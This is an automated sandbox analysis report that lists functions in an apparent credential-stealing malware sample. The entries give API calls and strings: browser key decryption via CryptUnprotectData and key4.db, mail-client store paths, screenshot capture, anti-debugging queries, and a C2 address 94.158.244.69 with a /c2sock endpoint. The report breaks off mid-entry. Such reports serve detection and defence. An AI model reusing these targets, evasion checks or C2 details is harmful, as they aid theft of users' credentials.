NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5

Strings

^^4, xrefs: 0042238B
^^4, xrefs: 00422365
]^4, xrefs: 00422191
^^4, xrefs: 0042225A

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Query$InformationProcessVirtual
String ID: ]^4$^^4$^^4$^^4
API String ID: 1364735940-2923853987
Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F

Function 0043323B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
GetSystemMetrics.USER32(00000001), ref: 004333C3
GetSystemMetrics.USER32(00000000), ref: 0043341E

Strings

DISPLAY, xrefs: 00433283

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Create
String ID: DISPLAY
API String ID: 1087689917-865373369
Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B

Function 00401FF9 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 254sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
ExitProcess.KERNEL32 ref: 00402428

Strings

Ku^%, xrefs: 004020FB
Ku^%, xrefs: 00402040

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ExitProcessSleep
String ID: Ku^%$Ku^%
API String ID: 911557368-1067927601
Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B

Function 004224A3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5

Strings

9a%^, xrefs: 004225B2
M%, xrefs: 0042265C
M%, xrefs: 0042277D

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID: 9a%^$M%$M%
API String ID: 1778838933-3204844187
Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A

Function 0042C0DA Relevance: 6.8, Strings: 5, Instructions: 552COMMON

Download Yara Rule

Strings

*.db, xrefs: 0042C479
%localappdata%\Mailbird\Store, xrefs: 0042C52E
Mail Clients\Mailbird, xrefs: 0042C138, 0042C424, 0042C474
\MessageIndex, xrefs: 0042C26E
kernel32.dll, xrefs: 0042C514

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
API String ID: 0-4169501468
Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF

Function 0043B362 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 550stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5

Strings

VL6T, xrefs: 0043B6ED
VL6T, xrefs: 0043BAF5
kernel32.dll, xrefs: 0043B79D

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: VL6T$VL6T$kernel32.dll
API String ID: 1586166983-858732239
Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB

Function 00430228 Relevance: 5.7, Strings: 4, Instructions: 717COMMON

Download Yara Rule

Strings

UL6T, xrefs: 00430495
kernel32.dll, xrefs: 00430A91
VL6T, xrefs: 0043093E
VL6T, xrefs: 00430812

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: UL6T$VL6T$VL6T$kernel32.dll
API String ID: 4038537762-2028718673
Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B

Function 004052D9 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 467encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575

Strings

os_c576xedrypt.encry576xedpted_key, xrefs: 00405A29
crypt32.dll, xrefs: 00405558, 004059AF

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CryptDataUnprotect
String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
API String ID: 834300711-975908830
Opcode ID: fb083bdf54fe577958849d68ecb72033554b56777c420c9d053bdbe08a402f79
Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
Opcode Fuzzy Hash: fb083bdf54fe577958849d68ecb72033554b56777c420c9d053bdbe08a402f79
Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A

Function 0042F278 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F

Strings

\key4.db, xrefs: 0042F317

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: \key4.db
API String ID: 4038537762-2908133219
Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF

Function 0042CFBA Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

^^4, xrefs: 0042D20F
]^4, xrefs: 0042CFF0
Mail Clients\eM Client, xrefs: 0042CFBE
^^4, xrefs: 0042D32D

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: Mail Clients\eM Client$]^4$^^4$^^4
API String ID: 0-1928883120
Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB

Function 00453BC4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36

Strings

Eastern Standard Time, xrefs: 00453CCF
Eastern Summer Time, xrefs: 00453CE3

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3335090040-239921721
Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99

Function 00438E28 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 417COMMON

Download Yara Rule

Strings

gU@, xrefs: 0043935E

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: gU@
API String ID: 0-63564854
Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B

Function 0040B7BB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B

Strings

ntdll.dll, xrefs: 0040B7F8

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Close
String ID: ntdll.dll
API String ID: 3535843008-2227199552
Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE

Function 0040B7F5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B

Strings

ntdll.dll, xrefs: 0040B7F8

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Close
String ID: ntdll.dll
API String ID: 3535843008-2227199552
Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB

Function 0277947E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027794A6
Module32First.KERNEL32(00000000,00000224), ref: 027794C6

Memory Dump Source

Source File: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Offset: 02778000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2778000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d2e462dbb2bb9301d781cb8ab8da24d9a2ca8af6625df05db7297e2d504587f7
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1DF09635101710AFEB203BF5DC8DB6FB6ECAF49624F100538E742914C0DB74E8454A61

Function 004245EC Relevance: 1.7, APIs: 1, Instructions: 207nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811

Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: InformationLibraryLoadQuerySystem
String ID:
API String ID: 1217483125-0
Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B

Function 00421EEB Relevance: 1.7, APIs: 1, Instructions: 153nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B

Function 004244E4 Relevance: 1.6, APIs: 1, Instructions: 71nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87

Function 0042F1C2 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68

Function 0044FB15 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4

Function 00443998 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

Function 0042F625 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 418
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,?), ref: 0042F9A2
lstrcatW.KERNEL32(?,?), ref: 0042F9CF
lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF

Strings

n_v, xrefs: 0042FCCB
n_v, xrefs: 0042FAAD
)lu, xrefs: 0042F81C
(lu, xrefs: 0042F811
n_v, xrefs: 0042FD1C
)lu, xrefs: 0042FCC2

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: (lu$)lu$)lu$n_v$n_v$n_v
API String ID: 4038537762-1534030094
Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

Function 0041A28F Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wctomb_s.LIBCMT ref: 0041A498

Strings

/c2sock, xrefs: 0041A814
file, xrefs: 0041A6E9
GhYuIq, xrefs: 0041A67A
hwid, xrefs: 0041A655
lid, xrefs: 0041A67F
pid, xrefs: 0041A669
94.158.244.69, xrefs: 0041A910

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _wctomb_s
String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
API String ID: 2865277502-1332857675
Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

Function 0420003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0420024D

Strings

cess, xrefs: 0420018D
kernel32.dll, xrefs: 0420008F, 04200095

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: d8f387950e94e0f911890dd075781802a2d2187e6bf4e70d8d513a47c1733b33
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B2526B74A11229DFDB64CF58D984BACBBB1BF09304F1480D9E54DAB392DB30AA85DF14

Function 00432718 Relevance: 10.7, APIs: 7, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateCompatibleDC.GDI32(00000D62), ref: 00432894
DeleteDC.GDI32(00000002), ref: 00432B01
DeleteObject.GDI32(?), ref: 00432B0A

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Delete$CompatibleCreateObject
String ID:
API String ID: 1022343127-0
Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

Function 0044CF15 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6

Strings

ext-ms-, xrefs: 0044CF80
api-ms-, xrefs: 0044CF6C

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

Function 0044575F Relevance: 9.3, APIs: 6, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 004458F2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
__allrem.LIBCMT ref: 00445925
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
__allrem.LIBCMT ref: 0044595A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58

Function 00433C10 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 252COMMON

Download Yara Rule

Strings

9a%^, xrefs: 00433D03
M%, xrefs: 00433D93
Screen.png, xrefs: 00433F6F

Memory Dump Source

